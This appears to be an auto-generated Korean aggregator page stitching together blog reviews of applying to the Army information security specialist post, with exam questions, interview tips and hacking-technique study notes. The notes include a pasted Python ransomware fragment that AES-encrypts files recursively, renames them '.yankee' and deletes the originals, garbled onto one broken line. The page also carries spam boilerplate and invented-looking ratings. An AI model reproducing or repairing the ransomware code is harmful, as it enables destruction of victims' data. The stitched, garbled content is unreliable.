Top 18 정보 보호 병 후기 Quick Answer

You are looking for information, articles, knowledge about the topic nail salons open on sunday near me 정보 보호 병 후기 on Google, you do not find the information you need! Here are the best content compiled and compiled by the Chewathai27.com/to team, along with other related topics such as: 정보 보호 병 후기 정보보호병 하는일, 정보보호병 자대배치, 정보보호병 경쟁률, 정보보호병 디시, 공군 정보보호병, 해군 정보보호병 후기, 공군 정보보호병 후기, 정보보호 병 지원동기

정보보호병이 나름 정예병이나, SW개발병에 비하면 나름 문턱도 작고 준비만 열심히 한다면 충분히 시도해 볼만한 보직인 것 같습니다. 필자도 보안에 관련해서는 모르는 부분이 정말 많지만, 적당한 공부를 통해 합격할 수 있었네요.

컴공은 꼭 군대를 여기로 가세요… (Feat. 정보보호병 / 소프트웨어개발병)

육군 정보보호병 후기

Article author: velog.io
Reviews from users: 1960 Ratings
Top rated: 3.6
Lowest rated: 1
Summary of article content: Articles about 육군 정보보호병 후기 Updating …
Most searched keywords: Whether you are looking for 육군 정보보호병 후기 Updating 육군 정보보호병에 지원해서 합격하게 되었습니다!저는 한림대학교 소프트웨어융합대학에 재학중이며 정보보안이나 해킹과는 거리가 좀 있는 사람인데도 어느정도 상식을 쌓으니 합격시켜주었네요. 관련 지식은 네트워크관리사 2급이랑 정보처리기능사를 취득하며 어느정도 접해봤고, 그 외
Table of Contents:

Article author: godbell.ghost.io
Reviews from users: 38824 Ratings
Top rated: 3.1
Lowest rated: 1
Summary of article content: Articles about 육군 정보보호병 합격 후기 #필기시험 #면접 #총평 뭐가 나올 지 몰라서 여러 정보보호병 후기들을 찾아 보았다. 정보보안기사 얘기가 많길래 면접 전날부터 모바일 자격증 시험 문제집 어플로 몇 개 … …
Most searched keywords: Whether you are looking for 육군 정보보호병 합격 후기 #필기시험 #면접 #총평 뭐가 나올 지 몰라서 여러 정보보호병 후기들을 찾아 보았다. 정보보안기사 얘기가 많길래 면접 전날부터 모바일 자격증 시험 문제집 어플로 몇 개 … 정보보호병 지원 두 번째 이야기, 정보보호병 면접과 필기시험 이야기이다.
Table of Contents:

바쁜 분들을 위한 요약

시험 준비

면접 준비

시험 내용

면접 내용

돌아가는 길

결과

정보보호병 지원 과정 총평

2021 정산

2020 정산

2019 정산

육군 정보보호병 합격 후기 #서류지원

Article author: apape1225.tistory.com
Reviews from users: 15354 Ratings
Top rated: 3.5
Lowest rated: 1
Summary of article content: Articles about [육군 정보보호병] 1차, 2차 후기 – (최종 합격!) 이런 후기를 쓰기는 싫었는데…… 현역 산업기능요원이 TO가 사라지고 특기병으로 지원해야겠다는 생각이 들어, 희망 입대일에 맞는 육군 정보보호병에 … …
Most searched keywords: Whether you are looking for [육군 정보보호병] 1차, 2차 후기 – (최종 합격!) 이런 후기를 쓰기는 싫었는데…… 현역 산업기능요원이 TO가 사라지고 특기병으로 지원해야겠다는 생각이 들어, 희망 입대일에 맞는 육군 정보보호병에 … 1.개요 이런 후기를 쓰기는 싫었는데…… 현역 산업기능요원이 TO가 사라지고 특기병으로 지원해야겠다는 생각이 들어, 희망 입대일에 맞는 육군 정보보호병에 지원하였다. 사실 나이도 많고, 현역 산업기능요..
Table of Contents:

태그

‘후기육군 정보보호병’ Related Articles

티스토리툴바

[육군 정보보호병] 1차, 2차 후기 - (최종 합격!) — [육군 정보보호병] 1차, 2차 후기 – (최종 합격!)

Article author: eschmannhan.tistory.com
Reviews from users: 20237 Ratings
Top rated: 3.6
Lowest rated: 1
Summary of article content: Articles about 육군 정보보호병 최종합격 후기 육군 정보보호병 최종합격 후기. eschmannhan 2021. 12. 27. 01:31. 1차 39점 8순위. 네트워크관리사2급 – 16점. 고교출석 -1? – 9점. 관련학과 2학년 재학 14점. …
Most searched keywords: Whether you are looking for 육군 정보보호병 최종합격 후기 육군 정보보호병 최종합격 후기. eschmannhan 2021. 12. 27. 01:31. 1차 39점 8순위. 네트워크관리사2급 – 16점. 고교출석 -1? – 9점. 관련학과 2학년 재학 14점. 1차 39점 8순위 네트워크관리사2급 – 16점 고교출석 -1? – 9점 관련학과 2학년 재학 14점 꽤나 높은 점수를 받았다. 내 기억으로는 30점이 이번 커트라인이고 선발순위는 50위다. 다른 정보보호병 관련글들을 보면..
Table of Contents:

Article author: alltime-it.tistory.com
Reviews from users: 15944 Ratings
Top rated: 3.5
Lowest rated: 1
Summary of article content: Articles about BLOG [INFORMATION GUARD] 정보보호병 합격 후기 01 오늘 2021년 05월 27일 필자의 군대 입대 프로젝트를 마쳤다. 코로나 시대… 정말 군대 가기 힘들다. …
Most searched keywords: Whether you are looking for BLOG [INFORMATION GUARD] 정보보호병 합격 후기 01 오늘 2021년 05월 27일 필자의 군대 입대 프로젝트를 마쳤다. 코로나 시대… 정말 군대 가기 힘들다. [INFORMATION GUARD] 정보보호병 합격 후기 01 오늘 2021년 05월 27일 필자의 군대 입대 프로젝트를 마쳤다. 코로나 시대… 정말 군대 가기 힘들다.. 한 달의 한번 떨리는 마음으로 있어야 했고, 늘 선착순 지원..
Table of Contents:

태그

최근글

육군 정보보호병 후기

육군 정보보호병에 지원해서 합격하게 되었습니다!

저는 소프트웨어융합대학에 재학중이며 정보보안이나 해킹과는 거리가 좀 있는 사람인데도 어느정도 상식을 쌓으니 합격시켜주었네요.

관련 지식은 네트워크관리사 2급이랑 정보처리기능사를 취득하며 어느정도 접해봤고, 그 외 문제를 좀 풀어보며 익히려고 노력했습니다.

합격 수기를 간단히 적어볼까 합니다.

과정

서류심사 (1차) 필기시험 (2차) 면접 (2차)

위와 같은 점수로 합격을 했습니다.

1차지원 같은 경우는 서류심사를 통해서 뽑고 2차는 대전충남지방병무청에 가서 필기시험과 면접 후에 최종 결과를 통보받을수 있었습니다.

서류에 관해서는 제가 딱히 드릴 말씀이 없습니다. 병무청 홈페이지에 들어가보시면 몇몇 자격증이 가선점을 주는데 저같은 경우는 동급 추가점수인 네트워크관리사나 정보처리기능사에 가산점이 붙고 다니는 학과에 추가점수를 받아 서류 34점으로 무난히 합격했습니다.

필기시험하고 면접을 준비한다고 상당히 애먹었는데 만약 정보보호병을 준비하시는 분들이 제 글을 본다면 조금 더 수월하게 준비할 수 있지 않을까 싶습니다.

필기 준비

필기는 무조건 정보보안기사 기출 풀어봐야 합니다.

보안기사에서 모든 문제가 다나옵니다.

기수가 틀려지면 모르겠지만 저같은 경우는 시험지에 10문제가 나왔고, 모두 보안 기사에서 한번씩은 본 문제들이여서 풀 수 있었습니다.

제가 보안기사 보면서 본 사이트 참조해드릴테니 다 보는건 현실적으로 무리가 있고 200문제 내지 300문제만 눈으로 훑어도 큰 도움이 되리라 확신합니다.

1~14회 보안기사 기출문제

다른 문제집 볼 필요 없이 계속 저것만 훑어보세요. 필기문제는 정말 저기서 갈라집니다.

평균적인 합격점수로 추론해봤을때 3~4문제 정도 맞추면 얼추 커트라인 이상으로 무난히 통과가 가능한 것 같습니다.

면접 준비

면접을 제가 참 고민을 많이 했습니다.

인터넷에 올라온 후기같은걸 보면 막 해킹기법 워터링 홀이 뭐냐, 브루트포스 어택을 아냐 이런씩으로 물어보시던데 이걸 그럼 다 외워가야하냐 생각이 막막했습니다.

면접은 총 두번에 걸쳐서 보는데, 한분은 군무원인거 같았고 한분은 대위이신것 같더라고요.

군무원 분은 만약 그룹간의 마찰이 생기면 어떻게 대처할 것인가, 또는 밤샘 근무할 일이 많을텐데 어떻게 대처할 것인가 이런 형식적인 질문을 하셨고 다수결에 따라서 어떻게 어떻게 할 것이다 라고 에둘러 대답하니 어찌저찌 넘어간 것 같습니다.

개인적인 생각으론 면접후에 핵심적인 질문은 대위님이 많이 하신 것 같았습니다.

대위님도 평범한 질문을 꽤 하셨는데, 그외에 제가 좀 핵심적으로 느낀 걸 꼽자면

로그를 아냐 아는 정보보안 장비가 있냐

이정도였습니다.

저는 막 복잡한 해킹기법 이야기하실줄 알고 준비를 꽤 많이 해갔는데 아쉽더라고요.

여기서 정말 임팩트있게 느낀건 아는 보안장비가 있냐는 질문이 나왔을 때 IPS랑 IDS를 말씀드리니 정말 눈이 틀려진 것 같았습니다. 간략히 설명하니 만족하셨던 것 같구요.

면접전에 공부한 이런 전문적인 지식을 내포하는게 핵심 포인트인 것 같습니다.

아래에 제가 면접 대비하며 정리해놓은 파일 기재할테니 참고하시면 좋을꺼같아요.

해킹 기법 정리

1.Syn/Ack Flood

코드출처: Normaltic

◉ client ack (클라이언트 데이터 보내기전 동기화 요청) ->server syn/ack(서버응답) -> client ack(클라이언트 응답)

◉ TCP접속을 성공시키기 위해 반드시 필요한 과정 – > 3way handshaking

◉ ack(응답)을 안보내니까 syn이 꽉차서 syn 백로그큐를 폭주시켜서 dinial of service 가 발생함

◉ FIN Flag를 이용한 4way handshaking 또한 존재

대응책

1.백로그큐 크기 늘림

2.신 쿠키 설정

3.방화벽에 임계치 설정

4.tcp 연결 과정 대기시간 줄임

DDOS 대응방안

◉ DOS공격이 맞는지 명확히 판단

◉ 형 파악 후 차단정책 근거 확보

◉ 차단정책 설정

◉ 공격대비/정책업데이트/좀비PC IP확보

◉ 막는법은 없고 서버 증설하거나 해당 ip를 서버에서 차단시킴 /서버 ip바꾸기/클라우드플레어

◉ 윈도우에서 iis(internet information service)에서 ip및 도메인 차단 들어가서 막기 시전

◉ 리눅스에서 root # route add -host [IP] reject

2.SQL Injection

Sql 질의문을 삽입하는 공격

◉ 정상 로그인

◉ 해커가 입력한 로그인

◉ where 절에서 and 조건은 or조건보다 선행되기 때문에 무조건 true값 리턴, 모든 데이터 출력되버림

◉ 대충 아이디 ~(SQL 질의문 추가)

◉ 정상적인 질의쿼리: select * from user where id=’[사용자ID]’

◉ 인젝션당한쿼리: select * from user where id=’[사용자ID]’~~~임의의 sql 구문

◉ blind/mass/union 등 다양한 변화형태 존재 blind->참거짓 리턴

◉ WAS(웹애플리케이션 서버) -> database

예: sql : {} 하나 사와

{} 빵

{} 빵 하나 사오고 건물 한채 계약해

DB에 임의의 SQL명령 실행(쉘까지 확보 가능)

DB의 데이터를 추출

인증 우회

DB 데이터 변조

◉ 악성 파일 업로드 가능 막는법: 쿼리와 관련된 코드를 죄다 필터링시켜서 시큐어 코딩

3.XSS Cross Site Scripting

진짜 간단히 말해서 이거.

대부분은 막아두지 근데 정말 보안 아예 안해둔 사이트는 안막아둠

보통은 이런씩으로 링크를 걸어서 알림창을 뜨게함

아스키코드로 위 실행명령을 변환시킨 뒤에 일부 웹서버는 필터링을 제대로 안해주므로 잘 통하는 경우가 있음

허점 즉, 취약점을 찾는 것이 중요함

워낙 변칙적이고 다 막기가 힘들어서 위험함

자바스크립트 형식으로 버튼/함수 응용가능

방지법

1.태그 써서 막기

2.필터링 등등..

xss 응용기법

◉ 칼리리눅스에서 xss를 응용한 BeEF 컨트롤 패널 등 사용가능

(browser exploitation framework project)

◉ 여기에 pretty theft 같은 기법이 있음( 홈페이지 똑같이 구현해서 가짜 홈페이지에 치게하고 로그따오는거)

4.RansomWare

import glob import os , random , struct from Cryptodome . Cipher import AES def encrypt_file ( key , in_filename , out_filename = None , chunksize = 64 * 1024 ) : if not out_filename : out_filename = in_filename + ‘.yankee’ iv = os . urandom ( 16 ) encryptor = AES . new ( key , AES . MODE_CBC , iv ) filesize = os . path . getsize ( in_filename ) with open ( in_filename , ‘rb’ ) as infile : with open ( out_filename , ‘wb’ ) as outfile : outfile . write ( struct . pack ( ‘ ‘ + filename ) encrypt_file ( key , filename ) os . remove ( filename ) for filename in glob . iglob ( startPath , recursive = True ) : if ( os . path . isfile ( filename ) ) : fname , ext = os . path . splitext ( filename ) if ( ext == ‘.enc’ ) : print ( ‘Decrypting> ‘ + filename ) decrypt_file ( key , filename ) os . remove ( filename )

5.WPA Crack

◉ 앞서 3 way handshake 가 세션을 연결하는 과정이었다면, 4 way handshake는 클라와 서버의 연결을 끊고 세션을 종료하는 과정임. 이 과정에서 해킹이 가능함

그 과정은 이러합니다.

◉ Fin wait -> close wait-> fin wait 2

◉ 여기서 time wait을 주는 이유는 Routing 지연이나 패킷 유실로 인한 재전송 등으로 인해 FIN패킷보다 늦게 도착하는 상황이 발생할 수 있기 때문

◉WPA란?

Wired Equivalent Privacy의 약자로 유선랜에 상당하는 Privacy를 제공하기 위한 알고리즘

◉ WEP를 보완하는 암호화 방식

WPA Version1, Vesion2가 있음

◉ 여기서 사용된 Aircrack-ng는 디텍터, 패킷 스니퍼, WEP와 [Wi-Fi Protected Aooo ccess|WPA]/WPA2-PSK 802.11 무선 LAN에 대한 크래커와 분석 도구가 탑재된 네트워크 소프트웨어이다.

IPS란?

침입 차단 시스템(侵入遮斷 – ,영어:Intrusion Prevention Systems (IPS), Intrusion Detection and Prevention Systems (IDPS)) 또는침입 방지 시스템은 외부네트워크로부터 내부 네트워크로 침입하는 네트워크패킷을 찾아 제어하는 기능을 가진소프트웨어또는하드웨어이다.

IBM Proventia, 윈스 Sniper IPS, Cisco 파이어파워, 티핑포인트 등

IDS란?

침입 탐지 시스템(Intrusion Detection System, IDS)은 일반적으로 시스템에 대한 원치 않는 조작을 탐지하여 준다. IDS는 매우 많은 종류들이 존재하며, 여기서는 그들 중 일부를 설명한다. 시스템에 대한 원치 않는 조작은 악의를 가진 숙련된해커또는 자동화된 툴을 사용하는스크립트 키디에 의한 공격의 형태로 행해질 수 있다

스노트나 브로같은게 ids 예

문제

클라이언트에서 서버로 쿠키를 보낼 때 사용하는 HTTP 헤더는?

-> set-cookie와 cookie 등의 선지가 있었다.

set-cookie, 중간에 개인정보 탈취등을 방지하기 위해 세션등이 사용됨 다음 중 전자상거래와 관련이 없는 것은?-> ebXML, SET, SSL, EMV가 선지였다.

ssl은 인터넷 데이터 암호화 기술 chmod 명령어의 특징이 아닌 것은?-> 파일과 디렉토리를 rename할 수 있다는 선지를 선택했다. HTTP 오류 코드와 그 뜻을 알맞게 짝지은 것이 아닌 것은?

-> 200, 403, 404, 500이 나왔다. 다음 중 입력값에 대한 검증 / 특수문자 처리를 하지 않은 것과 무관한 공격 기법은?

-> injection 기법 두세 종류와 ‘watering hole’이 나왔다. ‘watering hole’을 골랐다. watering hole : 워터링 홀 공격이란 공격대상이 자주 방문하는 홈페이지를 사전에 악성코드에 감염시킨 뒤 공격대상이 접속 할 때까지 잠복하면서 기다린다. 그리고 공격대상이 접속하면 비로서 공격을 시도하는 수법이다. 홈페이지에 접속하는 모든 사용자를 공격하기 때문에 접속하는 모든 사용자가 공격의 대상이 될 수 있다

◉ xss크로스사이트스크립트, 스크립트엔진 취약점과도 연관있음

리눅스 방화벽에서 ping에 대한 응답으로 ‘destination unreachable’을 리턴하기 위해 설정해야 하는 플래그는?

-> DENY, REJECT 등이 있었다. REJECT를 골랐다. 다음 화면은 어떤 명령어의 실행 결과인가? (ping 실행 화면)

-> 답이 ping이다 ㅋㅋ 다음 중 IPS에 대한 설명으로 올바르지 않은 것은? (그냥 IPS가 아니라 어플리케이션 뭐시기 IPS이었는데 기억이 안난다) 침해 단계의 심각성?에 따라 나열할 때, 빈칸에 들어갈 단어들은? (emergency에서 debug까지 나열되어 있었다.)

-> alert, info 등이 있었는데, 그냥 영어 할 줄만 알면 나열 가능하다

◉ 사고 전 준비 과정]→[사고 탐지]→[초기 대응]→[대응 전략 체계화]→[사고 조사]→[보고서 작성]→[해결]
침입이 있는데, 없다고 판단하는 경우는 뭐라고 하는가? (True/False Positive/Negative 중 선택)-> False Negative라고 답했는데, 맞을지 모르겠다.

◉ 1번

전자서명과 관련없는 프로토콜을 고르시오.

1. DSA

2. KCDSA

3. ECDSA

4. A5/3

=> 답 : 4

dsa가 digital signature algorithm 이므로 dsa붙은거 고르면된다.

◉ 2번

DB 보안으로서 적절하지 못한 자세는? (문제설명이 똑같지는 않지만 취지는 동일하다.)

1. 관리자를 최소한으로 만든다.

2. 로컬 계정으로 접속하는 것을 금지

3. Guest 계정으로 접속하는 것을 금지

4. 기억 안나는데 답은 아니였음

=> 답 : 2

로컬 계정으로 접속하는게 안되면 뭐 다 안되지

◉ 3번

SIEM에서 사용되는 프로토콜로 적절하지 못한 것은?

1. Qrader

2. Arcsight

3. SPLUNK

4. beStorm

=> 답 : 4 (정답은 기억 안나는데 나머지 보기는 틀린 보기임)

siem = sim(보안정보관리) + sem(보안이벤트관리)

◉ 4번

공개키와 대칭키 알고리즘을 사용하여 키교환을 하는 방식에서 제 3자가 해당 공개키를 인증할 수 있는 시스템은?

(문제설명이 똑같지는 않지만 취지는 동일하다.)

1. 키 분배 인증 센터

2. RSA ->공개키 암호시스템

3. Diffie Hellman

4. 기억 안남

=> 답 : 1

◉ 5번 문제 기억 안남

◉ 6번

파일 시스템 내에서 파일이나 디렉토리의 고유한 번호, 블록 정보 등이 담겨있는 파일은?

1. boot

2. data

3. i-node

4. 기억 안남

=> 답 : 3

◉ 7번

멀티 쓰레드나 멀티 프로세스에서 공유 자원을 여러 실행흐름이 접근하여 발생될 수 있는 취약점은?

1. buffer overflow 메모리 취약점 ->스택””은 해당버퍼에 할당된거보다 많이쓸때

2. Return to Library 라이브러리 함수 리턴

3. Race Condition ->상호배제,진행,한정대기

4. SQL Injection

=> 답 : 3

◉ 8번

웹 로그 파일에 기록되는 보기로 알맞지 않은 것을 고르시오.

1. IP 주소

2. 접속 시 Method

3. 접속 시 프로토콜

4. 접속 시 포트번호

=> 답 : 3 (정답이 정확하지는 않음 필자는 3번으로 적음)

◉ 9번

IDS가 수행되는 절차를 알맞게 배열한 보기를 고르시오.

=> 답 : [데이터 수집 -> 가공 -> 분석 -> 보고]

◉ 10번

TCP에서 4way HandShake의 연결 종료 과정에서 Seq와 ACK의 번호로 ㄱ, ㄴ, ㄷ, ㄹ에 알맞는 번호가 들어간 것을 고르시오.

=> 이 문제는 연결 종료 과정을 보여주면서 빈칸 기호와 번호가 일치하는 보기를 고르는 문제임. 답은 기억 안남

◉ strcpy 대신 strncpy를 사용하는 이유버퍼 오버플로우/scanf,getbyhostname등도 여기속함

◉ NMS가 확인할 수 없는 것호스트의 CPU 점유율

◉ 윈도우 공유 폴더 취약점(Null SessionIPC$

◉ TCP에서 클라이언트의 버퍼 오버플로우를 막기 위한 것흐름 제어

◉ crontab과 관련된 문제

◉ 사용자 인증 관련 문제최대 권한

◉ 다음 로그는 어떤 공격인가?랜드 공격(Land Attack)

◉ 디지털 포렌식에서 우선적으로 분석해야 하는 것레지스터

웹 대상으로 이루어지는 공격 시도를 막는 것웹 방화벽(WAF)

◉ 1. 파일 업로드 취약점을 묻는 문제 (단답식)

공격자는 서버 사이드 스크립트(PHP, JSP, .NET 등)을 이용하여 웹쉘(WebShell)을 제작

웹쉘(WebShell)은 원격에서 웹 서버를 제어하기 위한 목적으로 만들어졌으나, 지금은 웹쉘 = 악성코드라고 분류를 하여 안티 바이러스에서 탐지함

sql injection 과 다른점: 웹에서 노출되는 정보들을 하나씩 가져오는 sql injection 과 달리 파일 업로드 취약점은 웹쉘을 통해 시스템에 아예 침투하고 난 뒤 원하는 데이터들을 마음껏 가져오는 것

시큐어 코딩 – 소스코드 레벨 대응

◉ 2. 해시함수를 묻는 문제 (단답식)

임의의 길이를 갖는 임의의 데이터를 고정된 길이의 데이터로 매핑하는 함수를 말한다.

◉ 3. 메시지 인증코드를 묻는 문제 (단답식)

메시지 인증 코드(Message Authentication Code, 약칭 MAC)는메시지의 인증에 쓰이는 작은 크기의정보이다. MAC알고리즘은비밀 키를 입력받고, 임의-길이의 메시지를 인증한다.

◉ 4. 포맷 스트링 취약점을 묻는 문제 (답답식)

◉ 5. 운영체제 프로세스 상태 관련 문제 – 임계상태, 교착상태, 상호베재 등등 (객관식)

◉ 6. 포렌식 이미지 생성 프로그램을 묻는 문제 – nc, gz, tar, encase (객관식)

◉ 7. 로그 파일을 피해자 메일에 자동으로 전송하는 공격 프로그램을 묻는 문제 – 답 모름 ㅠㅠ (단답식)

◉ 8. VPN을 묻는 문제 (단답식)

◉ 9. OSI 7계층의 계층 중 설명에 대한 계층은 어느 계층인지 묻는 문제 (단답식)

면접준비

◉ CVE란 무엇입니까?

CVE(Common Vulnerabilities and Exposure)는 공개적으로 알려진 소프트웨어의 보안취약점을 가리키는 고유 표기를 뜻한

◉ APT 공격이 무엇입니까?

APT공격은 해커가 다양한 보안 위협을 만들어 특정 기업이나 조직의 네트워크에 지속적으로 가하는공격을 뜻한

◉ Zeroday공격이 무엇입니까?

제로 데이공격(또는 제로 데이 위협,Zero-DayAttack)은 컴퓨터 소프트웨어의 취약점을공격하는 기술적 위협으로, 해당 취약점에 대한 패치가 나오지 않은 시점에서 이루어지는공격을 말한다.

◉ 워러 크라이란 무엇입니까?

워너크라이(WannaCry) 또는워너크립트(WannaCrypt)[2],WanaCrypt0r 2.0는 2017년 5월 12일부터 등장한랜섬웨어멀웨어 툴이다. 2017년 5월 12일부터 대규모사이버 공격을 통해 널리 배포되었으며, 전세계 99개국의 컴퓨터 12만대 이상을 감염시켰다.[3][4]감염된 컴퓨터로는 20개의 언어로비트코인을 지급하면 풀어주겠다는 메시지를 띄웠다.

킬스위치 찾아냈고,방화벽이랑 인터넷 랜선꼽을때 유의하면 사전예방 가능

◉ 랜섬웨어란 무엇입니까?

랜섬웨어란 Ransom(몸값)과 Ware(제품)의 합성어로서 악성코드의 일종입니다. 해당 악성코드에 감염시컴퓨터 시스템에 접근이 제한되거나저장된 문서나 사진․동영상 파일이 암호화되어 사용할 수 없게 되며, 해커는 이에 대한 해제 대가로 금품을 요구합니다.

최근 이스라엘 보안 기업 만든 스파이웨어 페가수스가 애플뚫음

브루트 포스(무차별 대입 공격) 언급하며 그걸로도 몇백년 걸리는걸 뚫은게 대단하다고 생각함

기타 자료

TCP의 4-way Handshaking 과정
[STEP 1]
클라이언트가 연결을 종료하겠다는 FIN플래그를 전송한다. 이때A클라이언트는 FIN-WAIT상태가 된다.
[STEP 2]
B서버는 FIN플래그를 받고, 일단 확인메시지 ACK 보내고 자신의 통신이 끝날때까지 기다리는데 이 상태가

B서버의 CLOSE_WAIT상태다.
[STEP 3]
연결을 종료할 준비가 되면, 연결해지를 위한 준비가 되었음을 알리기 위해 클라이언트에게 FIN플래그를 전송한다. 이때 B서버의 상태는 LAST-ACK이다.
[STEP 4]
클라이언트는 해지준비가 되었다는 ACK를 확인했다는 메시지를 보낸다.

A클라이언트의 상태가 FIN-WAIT ->TIME-WAIT 으로 변경된다.

그런데 만약 “Server에서 FIN을 전송하기 전에 전송한 패킷이 Routing 지연이나 패킷 유실로 인한 재전송 등으로 인해 FIN패킷보다 늦게 도착하는 상황”이 발생한다면 어떻게 될까요?

Client에서 세션을 종료시킨 후 뒤늦게 도착하는 패킷이 있다면 이 패킷은 Drop되고 데이터는 유실될 것입니다.

A클라이언트는 이러한 현상에 대비하여 Client는 Server로부터 FIN을 수신하더라도 일정시간(디폴트 240초) 동안 세션을 남겨놓고 잉여 패킷을 기다리는 과정을 거치게 되는데이 과정을”TIME_WAIT”라고 합니다. 일정시간이 지나면, 세션을 만료하고 연결을 종료시키며,”CLOSE”상태로 변화합니다.

방화벽과 ips/ids 차이

ips/ids 차이

◉ 패킷

패킷의 구성요소

1) 헤더(Header)동기 신호 플래그, 전송지 주소, 목적지 주소, 순차 번호 등패킷에는 프로토콜의 다양한 정보들이 헤더에 기록되는데, 프로토콜에 따라 다름.

2) 데이터(Data)데이터 부분에는 실제로 전송될 내용이 있음.

3) 트레일러(Trailer)수신 측에서는 전송 중에 데이터가 손상되었는지 알 수 있음.

예) 전송 에러 검사 항목 CRC(Cyclic Redundancy Check)

OSI 7계층

Ids 침입탐지유형

◉ NIDS (네트워크 침입 감지 시스템)

◉ 호스트 침입 탐지 시스템 (HIDS)

SQL과 Blind SQL의 차이는?

◉ Sql인젝션은 쿼리를 삽입해 원하는 데이터를 한번에 얻어냄

◉ Blind sql인젝션은 쿼리가 참일때와 거짓일때의 반응으로만 데이터를 알아냄

Setuid가 뭔가요

◉ 리눅스 특수권한 중 하나로 루트유저 엑세스 파일에 일반유저가 접근하게끔 허가

◉ 8진수 4000이 비트

◉ Setgid는 8진수 2000

◉ 커널에 내장된 툴로써 패킷 필터링, connection tracking

iptables

john the ripper

브루트포스

리눅스 설정 파일/ 임시파일/ 물리적 장치

etc/tmp/dev

퍼온 정보도 많습니다

혹시 원작자이시거나 불편하신 점이 있다면 댓글에 적어주세요

정보보호병이 나름 정예병이나, SW개발병에 비하면 나름 문턱도 작고 준비만 열심히 한다면 충분히 시도해 볼만한 보직인 것 같습니다.

필자도 보안에 관련해서는 모르는 부분이 정말 많지만, 적당한 공부를 통해 합격할 수 있었네요.

아직 훈련소도 들어가보지 못했고 사령부에 배치받을지 사단급에 배치받을지도 모르지만,

아무런 생각없이 군생활 하는 것보다 특기를 살려서 하는 편이 훨씬 낫다는 확신이 듭니다.

겁내지 말고 도전해보면 뭐라도 주는것 같아요 ㅋㅋ

앞으로 정보보호병을 하며 얻게된 경험이나 일 또한 기밀을 제외하고 기재할 기회가 있길 바랍니다.

[육군 정보보호병] 1차, 2차 후기 – (최종 합격!)

반응형

1.개요

이런 후기를 쓰기는 싫었는데…… 현역 산업기능요원이 TO가 사라지고 특기병으로 지원해야겠다는 생각이 들어, 희망 입대일에 맞는 육군 정보보호병에 지원하였다. 사실 나이도 많고, 현역 산업기능요원을 대비해 취득해 놓은 정보처리기능사 자격증도 있어서 긴장은 되지 않았지만, 아는거라고는 리눅스 관리 밖에 없는 나에게 통신 관련 시험은 스트레스가 될 수 밖에 없었다. 그래도 선발된 22명중에 13등을 하며 여유롭게 합격했지만, 점수로는 22위와 3.5점차이밖에 나지 않는다. 점수가 많이 차이나지 않는걸로 보아 점수 분포도가 정말 촘촘하다는 것을 알 수 있었다.

2. 본문

– 1차 서류전형

지원서는 중요하지 않는다는 생각이 든다. 실제로도 그랬다. 그냥 분량 채워 넣었고 이런걸 꼼꼼하게 읽는다는 생각도 들지 않았다. 실제로 내 지원서도 많이 엉터리였으니까…… 중요한 것은 점수. 점수에 대한 배점은 아래 링크에서 자세히 알 수 있다.

정보보호병 모집안내문: https://www.mma.go.kr/contents.do?mc=mma0000516

배점내역은 다음과 같다.

당시에 자격증 하나와 관련 학과 3학년 재학을 하고 있었고, 고등학교 3학년 때 세미나 참여라는 이유로 몇번 결석을 했기에 결과는 38점. 그렇게 높지 않은 점수를 받았다. 등수는 선발된 44명중에 11등. 44명중에 반이 합격되니 나름 안정권이었지만, 점수 밀집도가 높은 만큼 시험에서 많은 영향을 받는다. 서류에서 두배수를 뽑게 되니 왠만하면 50%안에 드는 것이 좋지만 하고싶은 말은 그냥 시험만 잘 봐도 합격한다는 것이다.

– 2차 면접전형

면접전형은 간단하게 이루어진다. 하고싶은 조언은 무조건 일찍 도착하라는 것이다. 1시간 전에 면접장에 입실하였는데, 22등이었다. 면접장에 도착한 순서대로 번호표를 뽑고 면접에 임하기 때문에 21명이 면접 보는 것을 기다려야했다. 최대한 일찍 면접장으로 가는 것을 추천한다.

사람들이 다 모이면 약 40분에서 50분간 필기시험을 본다. 필기시험내용은 암호화, 전자서명, 해킹 기법에 관한 문제가 10문제 정도 나온다. 한문제당 2점 즉 필기시험에서 20점을 가져간다는 것이다.

시험을 다 보면 온 순서대로 전체인원의 반은 면접장으로 올라가고 나머지 반은 밑에서 대기한다. 면접장으로 올라가면 방이 두개 있다. 전문가 한분, 실제 군복무를 하시는 군인분이 한 분이 각각 방에 계시고 면접자들은 순서대로 두개의 방에서 면접을 보게된다. 경험상 한 반에서는 인성과 단체 생활 그리고 안보관에 대해 평가하는 곳이고 다른 한곳은 전문적인 지식을 평가하는 곳이라고 판단이 된다. 면접 평가 배점은 다음과 같다.

지금까지 생각나는 면접 질문과 그에 대한 나의 답변을 쭉 적어보았다.

– 첫번째 방에서 받은 질문

질문 답변 정보보호병에 지원한 이유가 무엇인가요? 저는 중학교 시절부터 개발자를 꿈꾸게 되었습니다. 고등학교 때는 관련 동아리 대학교 때는 직접적으로 연관있는 학과에 진학하여 개발자에게 필요한 지식을 관철하고 있습니다. 정보보호병은 이런저에게 큰 기회이고 스스로도 국방의 의무를 다할 수 있는 가장 좋은 방법이라고 생각하여 지원하게 되었습니다. 정보보호병이 되면 어떤일에 기여할 수 있을 것 같나요? 지금 재직중인 회사에서 개발자로 근무하고 있으며 아마존과 같은 클라우드 서비스를 활용해 웹 페이지를 배포해본 경험도 있습니다. 이런 서버관련 지식과 로그 관리 경험이 정보보호병에 큰 도움이 될 수 있을 것 같습니다. 알바나 단체활동에 대한 경험이 있나요? 회사생활을 하신 것 같은데 자세하게 이야기 해주시기 바랍니다. CJ Olivenetworks에서 시스템 개발과 관련된 업무를 계약직 형태로 고용되어 하고 있습니다. 단체생활에선 어떤점이 중요하다고 생각하시나요? 단체생활에서 중요한점은 ‘마음가짐’이라고 생각합니다. 전에 경험했던 대외활동에서 두개의 조를 나눠 하나의 시스템을 구축하는 과정에 참여하였습니다. 같은 시간과 교육을 제공받았지만 결과물에는 차이가 있었습니다. 그 이유를 생각해보니 각 조의 마음가짐이 달랐다고 생각합니다. 한 조는 대외활동을 했다는 한줄이 필요했던 사람들이 많았지만 다른 조는 이 경험을 통해 자신의 개발능력을 키우려는 사람이 많았습니다. 정보보호병이 되어도 배치되는 부대에 따라 전산기기를 운영해야하는 일을 할 수도 있는데, 그렇게 되도 잘 수행할 수 있 을 것 같습니까? 대학교에서 서버 머신이 총 7대이고 운 좋게 그 중 하나를 맡아 관리한 경험이 있습니다. 지금까지고 해당 서버를 관리중인데 이런 경험을 살려 하드웨와 관련된 업무도 충분히 수행할 수 있을 것 같습니다. 북한에 대해 어떻게 생각하십니까. 북한은 주적입니다. 우리에게 직접적으로 위협이 되는 존재이기 때문입니다. 그렇다고 북한을 혐오해야한다는 것은 아니지만, 항상 긴장감을 가지고 주시해야 